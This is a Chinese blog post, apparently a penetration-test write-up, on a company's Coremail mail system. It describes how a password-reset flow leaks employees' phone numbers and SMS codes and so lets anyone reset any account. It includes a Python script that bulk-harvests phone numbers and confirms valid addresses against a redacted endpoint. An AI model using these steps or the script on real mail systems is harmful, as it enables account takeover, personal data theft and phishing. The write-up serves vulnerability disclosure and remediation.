某公司邮件系统的安全检测

最新推荐文章于 2023-09-05 22:40:35 发布
最新推荐文章于 2023-09-05 22:40:35 发布
阅读量1.9k 收藏
点赞数
分类专栏: Web安全
原文链接:https://mp.weixin.qq.com/s/dGh4cvt2dy2Abt3nA3Dfag?st=CB6F788A2441147D2A4CCA7C0E2FE74A0740CAB3B7E2F47E4C4B8EE6C248D9FB4C3EC0505163937553A26E0CC3C4C49530938E769EC6E458F44EC9F186DBF95122FECE1F054F1E92D2F61F1F82FACBAE764A0FB78567E806D83963EC479A75CBFF5B1D9848
版权

目前分析

 

1、地址:https://mail.*****com/coremail/

分析:

登录功能和忘记密码功能;

目前站点是邮箱系统。方向:爆破、逻辑漏洞-密码找回

图片

信息收集

1、google通过域名收集相关网站获取邮箱信息,inur:***

2.经过多个邮箱信息收集,发现邮箱命名规则

密码找回

输入获取到的邮箱,点击获取邮箱的手机号码,并进行 抓放

图片

返回绑定的手机号码,信息泄露,如果失败时返回错误的

图片

在点击 【获取短信内容】,发现有个**code的内容,四位数,可能是验证码,把这个验证码输入进去,成功了。    [是它是它,就是它]

图片

输入验证码,下一步成功了,说明是正确的,重置任意账户邮箱密码

PYTHON可批量获取手机号码

1、收集当前公司员工名字转换成拼音

2、手机公布的邮箱信息

只是简单写一下获取手机号码 判断邮箱用户真实

import requests
import json
'''
通过邮箱转换批量获取手机号码和获取正确的邮箱
'''

headers={
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0',
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Connection': 'close',
'Origin':'https://mail.******.com',
'Referer':'https://mail.******.com/coremail/changepwd.jsp?uid=',
'Host':'crm.******.com:80',
'Content-Length': '61'
}

def poststrfox():
    name='***name'
    mail=name+'@******.com'
    data = {
        'mail': mail,
        'lyPass': 'q76a5e96JIQwRMqTTtzWMA=='
    }

    url='https://crm.******.com:80/getPhone'
    req = requests.port(url=url,data=data,headers=headers)
    rtext = req.text
    dic_jsdict = json.loads(rtext)  #返回的是json格式的,所以需要转换一下
    message = dic_jsdict['message']
    print(message, '|', mail)

    poststrfox()

危害/修复:

1、可以爆破获取用户名

2、通过用户可以获取手机号码,信息泄露

3、可以重置任意账户邮箱密码,包括高管的邮箱手机号码,获取邮箱权限,可干的事情很多,钓鱼等。

修复建议

升级当前邮件系统

zhangge3663
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[系统安全] 五十二.DataCon竞赛 (1)2020年Coremail钓鱼邮件识别及分类详解
杨秀璋的专栏
08-10 3526
系统安全将更好地帮助初学者了解病毒逆向分析和系统安全。前文详细介绍如何构建深度学习模型实现恶意软件家族分类,这是安全领域典型的任务或工作。这篇文章是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春,且看且珍惜!
邮箱安全测试工具
11-12
为了自己方便用易语言写的伪造发件人的邮箱安全测试工具,可以匿名发邮件,伪造发件人发邮件等,用来测试邮件服务器安全,也可作为渗透测试的辅助工具。 易语言可能会被某些杀毒软件误认为病毒,为正常,请放心使用。
关于邮件系统安全性的若干测试
crs3669367的博客
05-10 1897
目前邮件系统主要使用smtp协议,smtp协议本身并不确保邮件安全。下面我们测试以下邮件系统安全性: 漏洞组件 几乎所有接受入站 SMTP 连接的加密应用都可能受到攻击。我们的研究还...
信息安全技术实验三 邮件服务安全实验
饮啖茶食个包
03-04 8835
一、实验目的及要求1、 掌握对称加密和非对称加密原理; 2、 了解电子邮件的传输协议和电子邮件传输的报文格式; 3、 了解Windows平台下MDaemon邮件服务器的安全配置和Linux平台下Sendmail邮件服务器的安全配置; 4、 了解PGP的工作原理和密钥管理方法,能够使用PGP对文件和邮件进行加密和数字签名。二、实验环境及相关情况(包含使用软件、实验设备、主要仪器及材料等)
基于linux系统的邮件服务器的搭建与安全测试
weixin_33744854的博客
03-24 430
一、简介 基于LINUX操作系统的邮件服务器,一般由sendmail(发送邮件)和dovecot(接收邮件)所组成,sendmail的虽然不尽完美,与其他例如qmail,postfix相比配置相当复杂,功能也有限,但是sendmail的历史比较久,所以用户还是占据了50%左右。下面我们就对其进行简单介绍以下。 SENDMAIL概述 sendmail...
信息安全综合测试用邮箱
m0_46316218的博客
07-10 1975
信息安全综合测试用邮箱 12315421351@qq.com asdf@126.com 7213817@qq.com 123412@qq.com 123412341234@126.com 157asd@126.com
公司网络安全方案.doc
06-08
题目:某公司网络安全方案 随着网络技术的不断发展,网络应用已经遍布各行各业,网络系统的安全问题显得 越来越重要。由此看来,网络安全已经成为网络管理员在网络构建、网络升级与网络日 常管理中的头等大事。 建设...
某国际贸易公司光纤自动检测告警系统研讨.docx
12-04
光纤自动检测告警系统是现代通信网络中不可或缺的组成部分,尤其是在国际贸易公司这样的大型企业中,确保通信线路的稳定性和安全性至关重要。本文主要介绍的FIS2000光纤监测系统是一款先进的智能系统,能够实现对...
某信息安全审计管理系统概述.pptx
10-12
此系统由广东天海威数码技术有限公司研发,旨在提供新一代的互联网安全审计解决方案,以保障网络环境的安全和合规。 1. **系统功能** - **行为监控**:实时监测用户的上网行为,包括浏览网页、文件下载、音视频流...
多级分布式网络系统安全建设经典案例.docx
03-10
【多级分布式网络系统安全建设】是现代信息技术发展中的重要课题,尤其对于国有大型企业而言,网络系统的安全性关乎国家安全企业运营。随着信息化进程的加速,网络已经成为国家基础设施的关键组成部分,涉及电子...
安全电子邮件 PGP 的分析和使用.docx
12-23
安全电子邮件 PGP 的分析和使用 PGP(Pretty Good Privacy),是一个基于RSA公匙加密体系的邮件加密软件。可以用它对邮件保密以防止非授权者阅读,它还能对邮件加上数字签名从而使收信人可以确认邮件的发送者,并能确信邮件没有被篡改。它可以可以提供一种安全的通讯方式,而事先并不需要任何保密的渠道用来传递密匙。它采用了一种RSA和传统加密的杂合算法,用于数字签名的邮件文摘算法,加密前压缩等,还有一个良好的人机工程设计。它的功能强大,有很快的速度。而且它的源代码是免费的。
网站安全检测&漏洞扫描系统&邮件安全
sleepykino的博客
10-15 5065
安全产品 网站安全检测 漏送扫描系统 邮件安全
STARTTLS在电子邮件环境中的安全性分析
Linuxprobe18的博客
11-23 636
导读 STARTTLS,是一种明文通信协议的扩展,能够让明文的通信连线直接成为加密连线(使用SSL或TLS加密),而不需要使用另一个特别的端口来进行加密通信,属于机会性加密。 STARTTLS,是一种明文通信协议的扩展,能够让明文的通信连线直接成为加密连线(使用SSL或TLS加密),而不需要使用另一个特别的端口来进行加密通信,属于机会性加密。 电子邮件客户端和服务器之间的连接提供了两种使用 TLS 保护的方法:隐性 TLS 从一开始就对连接进行加密并在单独的端口上运行,而 STARTTLS 提供
邮件安全风险评估方案
煜铭2011
04-08 1567
网络安全意识风险评估是测试员工信息安全意识的最有效评估手段。通过实战实训实践,让员工进行体验式、参与式、实战性的网络安全场景,从而得出公司内部员工整体的信息安全​意识水平。​
安全威胁情报之HackingTeam邮件分析
Coisini的博客
06-12 1430
HackingTeam事件发生以来,很多Team与个人都对暴露出的数据进行了分析,挖掘出了很多的0day Exploit、RCS机制、UEFI Rootkit等等,很多从技术上展开了深入分析,对邮件也有全部导出公布到网上供查询和浏览的(虽然可以查询和浏览,但不够方便),除了0Day漏洞、漏洞利用技术、远程控制技术以外,邮件其实有很多值得分析,能够挖掘出有意思的情报信息。当然,对于不同的技术人员...
coremail邮件安全网关产品详细学习笔记(上)
securitypaper的博客
01-01 1404
根据Coremail论客与奇安信行业安全研究中心的联合监测评估,2020年,全国企业邮箱用户共收到各类钓鱼邮件约460.9亿封,相比2019年收到各类钓鱼邮件的344.3亿封增长了33.9%。
企业内部邮件系统毕业设计
最新发布
meQQ593186283的博客
09-05 346
邮件系统的基本功能包括:用户登录、通讯录管理、邮件收取、邮件发送、查看邮件、邮件的管理功能。本文从软件体系结构设计模式的角度入手,首先设计和实现一个支持邮件收发、管理等基本功能的邮件管理系统,并在此基础上添加各项扩展功能。在介绍Struts2和MVC整体架构相关理论的基础上,研究如何使用这些JAVA框架和技术,使用MyEclipse开发工具构建灵活、实用的邮件收发平台。此邮箱系统功能主要分为管理员管理和用户管理两大部分,管理员管理主要包括管理用户信息、删除用户等;该系统可以根据对功能需求进行扩展和完善。
gophish企业内部钓鱼邮件测试
wxkylin9的博客
03-11 3805
这里写自定义目录标题前言域名与伪造邮箱账号gophish搭建gophish使用常见问题及注意事项 前言 最近由于公司需要,进行了一次gophish钓鱼测试,我也被迫从一个完全没有接触过gophish的小小白变成了一个全面了解gophish所有功能的小白。中间历经千难万险,在此总结。 由于实践项目涉及公司机密,所以本文主要以叙述为主。 域名与伪造邮箱账号 现有的大多数gophish都是建议搭一个本地的邮箱服务器,然后可以任意伪造域名。但是这样子难以绕过SPF协议,容易被收件方拦截。并且搭建邮件服务器有许多不便
Coremail 远程命令执行漏洞
Jdjdjjdjdjdje的博客
08-22 3424
OSCS 是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业微信机器人获取一手的情报。在 Coremail XT5/XT6 版本中,邮件处理功能存在溢出风险,攻击者构造恶意邮件,向任意邮箱地址发送该恶意邮件,当服务器处理邮件时,会触发漏洞,造成任意命令执行等危害。官方公告认为该漏洞不能稳定复现,在实际场景中难以利用,危害有限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值